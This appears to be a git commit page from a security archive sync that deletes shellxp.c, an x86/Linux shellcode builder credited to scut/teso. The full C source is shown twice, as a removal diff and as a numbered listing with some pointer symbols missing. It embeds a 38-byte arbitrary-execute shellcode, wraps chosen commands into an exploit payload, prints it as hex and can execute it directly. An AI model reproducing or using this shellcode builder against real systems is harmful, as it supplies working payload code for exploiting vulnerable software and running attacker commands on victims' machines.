packetstorm sync

author: SkyperTHC 2026-03-04 16:56:48 +0000
committer: SkyperTHC 2026-03-04 16:56:48 +0000
commit: 9da824575b3f4496431691bdb3f6ce45c601accc (patch)
tree: 781ffcc47483852cc340a7a84b2508aae292db83 /other/shell/shellxp.c
parent: bf6359d15fbb74aa95d36b1137fdc785def1bc46 (diff)
1 files changed, 0 insertions, 130 deletions
diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c
deleted file mode 100644
index 4d5916b..0000000
--- a/other/shell/shellxp.c
+++ /dev/null
@@ -1,130 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <ctype.h>
-#include <string.h>
-/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
- */
-unsigned char   shellcode[] =
-        "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
-        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
-        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
-        "\xff\xff";
-static int      sc_build (unsigned char *target, size_t target_len,
-        unsigned char *shellcode, char **argv);
-void    hexdump (unsigned char *cbegin, unsigned char *cend);
-static int
-sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
-        char **argv)
-{
-        int     i;
-        size_t  tl_orig = target_len;
-        if (strlen (shellcode) >= (target_len - 1))
-                return (-1);
-        memcpy (target, shellcode, strlen (shellcode));
-        target += strlen (shellcode);
-        target_len -= strlen (shellcode);
-        for (i = 0 ; argv[i] != NULL ; ++i)
-                ;
-        /* set argument count
-         */
-        target[0] = (unsigned char) i;
-        target++;
-        target_len--;
-        for ( ; i > 0 ; ) {
-                i -= 1;
-                if (strlen (argv[i]) >= target_len)
-                        return (-1);
-                printf ("[%3d/%3d] adding (%2d): %s\n",
-                        (tl_orig - target_len), tl_orig,
-                        strlen (argv[i]), argv[i]);
-                memcpy (target, argv[i], strlen (argv[i]));
-                target += strlen (argv[i]);
-                target_len -= strlen (argv[i]);
-                target[0] = (unsigned char) (i + 1);
-                target++;
-                target_len -= 1;
-        }
-        return (tl_orig - target_len);
-}
-void
-hexdump (unsigned char *cbegin, unsigned char *cend)
-{
-        int             i;
-        unsigned char * buf = cbegin;
-        printf ("/* %d byte shellcode */\n", cend - cbegin);
-        printf ("\"");
-        for (i = 0 ; buf < cend; ++buf) {
-                printf ("\\x%02x", *buf & 0xff);
-                if (++i >= 12) {
-                        i = 0;
-                        printf ("\"\n\"");
-                }
-        }
-        printf ("\";\n\n");
-}
-int
-main (int argc, char *argv[])
-{
-        int             n;
-        unsigned char   tbuf[2048];
-        void            (* tbuf_f)(void) = (void *) tbuf;
-        printf ("build exploit shellcode\n");
-        printf ("-scut / teso.\n\n");
-        if (argc < 2) {
-                printf ("usage: %s [exec] commands ...\n\n",
-                        argv[0]);
-                exit (EXIT_FAILURE);
-        }
-        printf ("constructing shellcode...\n\n");
-        memset (tbuf, '\x00', sizeof (tbuf));
-        if (strcmp (argv[1], "exec") == 0)
-                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
-        else
-                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
-        if (n == -1) {
-                printf ("failed to build it.\n");
-                exit (EXIT_FAILURE);
-        }
-        printf ("shellcode size: %d bytes\n\n", n);
-        hexdump (tbuf, tbuf + n);
-        if (strcmp (argv[1], "exec") == 0)
-                tbuf_f ();
-        exit (EXIT_SUCCESS);
-}
author	SkyperTHC	2026-03-04 16:56:48 +0000
committer	SkyperTHC	2026-03-04 16:56:48 +0000
commit	9da824575b3f4496431691bdb3f6ce45c601accc (patch)
tree	781ffcc47483852cc340a7a84b2508aae292db83 /other/shell/shellxp.c
parent	bf6359d15fbb74aa95d36b1137fdc785def1bc46 (diff)

diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c deleted file mode 100644 index 4d5916b..0000000 --- a/other/shell/shellxp.c +++ /dev/null
@@ -1,130 +0,0 @@
1
2	#include <stdio.h>
3	#include <stdlib.h>
4	#include <unistd.h>
5	#include <ctype.h>
6	#include <string.h>
7
8
9	/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
10	*/
11	unsigned char shellcode[] =
12	"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
13	"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
14	"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
15	"\xff\xff";
16
17	static int sc_build (unsigned char *target, size_t target_len,
18	unsigned char shellcode, char *argv);
19
20	void hexdump (unsigned char cbegin, unsigned char cend);
21
22
23	static int
24	sc_build (unsigned char target, size_t target_len, unsigned char shellcode,
25	char **argv)
26	{
27	int i;
28	size_t tl_orig = target_len;
29
30
31	if (strlen (shellcode) >= (target_len - 1))
32	return (-1);
33
34	memcpy (target, shellcode, strlen (shellcode));
35	target += strlen (shellcode);
36	target_len -= strlen (shellcode);
37
38	for (i = 0 ; argv[i] != NULL ; ++i)
39	;
40
41	/* set argument count
42	*/
43	target[0] = (unsigned char) i;
44	target++;
45	target_len--;
46
47	for ( ; i > 0 ; ) {
48	i -= 1;
49
50	if (strlen (argv[i]) >= target_len)
51	return (-1);
52
53	printf ("[%3d/%3d] adding (%2d): %s\n",
54	(tl_orig - target_len), tl_orig,
55	strlen (argv[i]), argv[i]);
56
57	memcpy (target, argv[i], strlen (argv[i]));
58	target += strlen (argv[i]);
59	target_len -= strlen (argv[i]);
60
61	target[0] = (unsigned char) (i + 1);
62	target++;
63	target_len -= 1;
64	}
65
66	return (tl_orig - target_len);
67	}
68
69
70	void
71	hexdump (unsigned char cbegin, unsigned char cend)
72	{
73	int i;
74	unsigned char * buf = cbegin;
75
76
77	printf ("/* %d byte shellcode */\n", cend - cbegin);
78	printf ("\"");
79
80	for (i = 0 ; buf < cend; ++buf) {
81
82	printf ("\\x%02x", *buf & 0xff);
83
84	if (++i >= 12) {
85	i = 0;
86	printf ("\"\n\"");
87	}
88	}
89	printf ("\";\n\n");
90	}
91
92
93	int
94	main (int argc, char *argv[])
95	{
96	int n;
97	unsigned char tbuf[2048];
98	void (* tbuf_f)(void) = (void *) tbuf;
99
100
101	printf ("build exploit shellcode\n");
102	printf ("-scut / teso.\n\n");
103
104	if (argc < 2) {
105	printf ("usage: %s [exec] commands ...\n\n",
106	argv[0]);
107
108	exit (EXIT_FAILURE);
109	}
110
111	printf ("constructing shellcode...\n\n");
112	memset (tbuf, '\x00', sizeof (tbuf));
113	if (strcmp (argv[1], "exec") == 0)
114	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
115	else
116	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
117	if (n == -1) {
118	printf ("failed to build it.\n");
119	exit (EXIT_FAILURE);
120	}
121
122	printf ("shellcode size: %d bytes\n\n", n);
123	hexdump (tbuf, tbuf + n);
124
125	if (strcmp (argv[1], "exec") == 0)
126	tbuf_f ();
127
128	exit (EXIT_SUCCESS);
129	}
130